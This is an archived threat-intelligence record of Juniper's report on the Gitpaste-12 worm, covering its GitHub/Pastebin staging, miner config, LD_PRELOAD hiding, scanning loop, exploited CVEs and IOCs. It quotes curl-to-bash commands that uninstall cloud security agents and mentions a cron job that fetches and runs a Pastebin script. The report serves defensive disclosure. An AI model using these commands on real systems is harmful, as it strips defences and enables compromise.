{
	"id": "d3969813-d1b7-4860-bc2b-0305bb2f0b8d",
	"created_at": "2026-04-06T00:11:15.160867Z",
	"updated_at": "2026-04-10T03:32:46.095728Z",
	"deleted_at": null,
	"sha1_hash": "9a4ecc3ff1362fd7c03873a83df72c1b442fc255",
	"title": "Gitpaste-12: a new worming botnet with reverse shell capability spreading via GitHub and Pastebin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 479288,
	"plain_text": "Gitpaste-12: a new worming botnet with reverse shell capability spreading via GitHub and Pastebin\r\nBy Alex Burt\r\nPublished: 2020-11-05 · Archived: 2026-04-05 16:59:06 UTC\r\nGitpaste-12 is a new worm recently discovered by Juniper Threat Labs, which uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available.\r\nThere is evidence of test code for possible future modules, indicating ongoing development for this malware. For now, however, targets are Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices.\r\nThis malware has been dubbed Gitpaste-12 because of its use of GitHub, Pastebin and 12 ways to compromise the system. The first Gitpaste-12 attacks were detected by Juniper Threat Labs on October 15, 2020. We have reported both the Pastebin URL and the git repo in question, and the git repo was closed on October 30, 2020. This should stop the proliferation of this botnet.\r\nThe GitHub repository used at the time of discovery was as follows:\r\nhttps://github[.]com/cnmnmsl-001/-\r\nFirst commit: Thu Jul 9 21:07:06 2020\r\nLast commit: Oct 27, 2020\r\nhttps://blogs.juniper.net/en-us/threat-research/gitpaste-12\r\nPage 1 of 8\n\nAnatomy of Gitpaste-12\r\nThe first phase of the attack is the initial system compromise (the details of the compromises used by this worm are discussed later in this piece). This worm has 12 known attack modules and more under development. The worm will attempt to use known exploits to compromise systems and may also attempt to brute force passwords.\r\nImmediately after compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet.\r\nThe main shell script uploaded to the victim machine during the attack starts to download and execute the other components of Gitpaste-12. First, it downloads and sets up a cron job, which periodically downloads and executes a script from Pastebin. Next, it downloads shadu1 from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.\r\nThe malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, SELinux and AppArmor, as well as common attack prevention and monitoring software.\r\nThe shadu1 script contains comments in Chinese and has multiple commands available to attackers to disable different security capabilities, as discussed above. The following example contains commands that disable cloud security agents, which clearly indicates that the threat actor intends to target public cloud computing infrastructure provided by Alibaba Cloud and Tencent.\r\nExamples of these commands include:\r\ncurl https://update.aegis.aliyun.com/download/uninstall.sh | bash\r\ncurl https://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash\r\n/usr/local/qcloud/stargate/admin/uninstall.sh\r\n/usr/local/qcloud/YunJing/uninst.sh\r\n/usr/local/qcloud/monitor/barad/admin/uninstall.sh\r\nAnother capability is the ability to run a Monero cryptocurrency miner with the following config:\r\n{ \"background\": true, \"log-file\": null, \"access-log-file\": null, \"retries\": 50, \"retry-pause\": 5, \"donate-level\": 2, \"coin\": \"xmr\", \"custom-diff\": 0, \"syslog\": false, \"verbose\": false, \"colors\": true, \"workers\": true, \"pools\": [ { \"url\": \"donate.v2.xmrig.com:5555\", \"user\": \"41qALJpqLhUNCHZTMSMQyf4LQotae9MZnb4u53JzqvHEWyc2i8PEFUCZ4TGL9AGU34ihPU8QGbRzc4FB2nHMsVeMHaYkx\r\n\"pass\": \"x\" } ], \"bind\": [ \"0.0.0.0:12388\" ], \"api\": { \"port\": 0, \"access-token\": null, \"worker-id\": null }}\r\nThe Gitpaste-12 malware contains the library hide.so, which is loaded via LD_PRELOAD. hide.so updates the crontab file to download and execute https://pastebin[.]com/raw/Tg5FQHhf. It also prevents administrators from collecting information about running processes by intercepting \"readdir\" system calls and skipping the directories for processes such as tcpdump, sudo, openssl, etc. in \"/proc\". The \"/proc\" directory in Linux contains information about running processes; it is used, for example, by the \"ps\" command to show information about running processes. But unfortunately for this threat actor, this implementation does not do what they expect it to do.\r\nWorming Capability\r\nThe Gitpaste-12 malware also contains a script that launches attacks against other machines in an attempt to replicate and spread. It chooses a random /8 CIDR for attack and will try all addresses within that range, as demonstrated by this call:\r\nwhile true;do awk -va=\\$((\\$RANDOM%128)) ‘BEGIN{for(b=0;256\u003eb;b++) for(c=0;256\u003ec;c++) for(d=0;256\u003ed;d++)\r\nsystem(\\”./sh \\”a\\”.\\”d\\”.\\”c\\”.\\”b\\”\r\nAnd here we can see the worm attempting to spread:\r\nAnother version of the script also opens ports 30004 and 30005 for reverse shell commands:\r\nGitpaste-12 Exploits\r\nGitpaste-12 uses 11 vulnerabilities and a telnet brute forcer to spread. Known vulnerabilities include:\r\nCVE-2017-14135 Webadmin plugin for opendreambox\r\nCVE-2020-24217 HiSilicon based IPTV/H.264/H.265 video encoders\r\nCVE-2017-5638 Apache Struts\r\nCVE-2020-10987 Tenda router\r\nCVE-2014-8361 Miniigd SOAP service in Realtek SDK\r\nCVE-2020-15893 UPnP in D-Link routers\r\nCVE-2013-5948 Asus routers\r\nEDB-ID: 48225 Netlink GPON Router\r\nEDB-ID: 40500 AVTECH IP Camera\r\nCVE-2019-10758 MongoDB\r\nCVE-2017-17215 Huawei router\r\nConclusion\r\nNo malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization, or to your hosts attempting to infect other networks across the internet, resulting in a poor reputation for your organization.\r\nJuniper Connected Security customers using SRX IDP and Juniper ATP Cloud are protected against Gitpaste-12.\r\nIOCs\r\nSome compromised systems have TCP ports 30004 and 30005 open for shell commands.\r\nMiner: e67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9\r\nhide.so: ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b\r\nMiner config: bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1\r\nShell script: 5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3\r\nSource: https://blogs.juniper.net/en-us/threat-research/gitpaste-12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/gitpaste-12"
	],
	"report_names": [
		"gitpaste-12"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434275,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.pdf",
		"text": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.txt",
		"img": "https://archive.orkl.eu/9a4ecc3ff1362fd7c03873a83df72c1b442fc255.jpg"
	}
}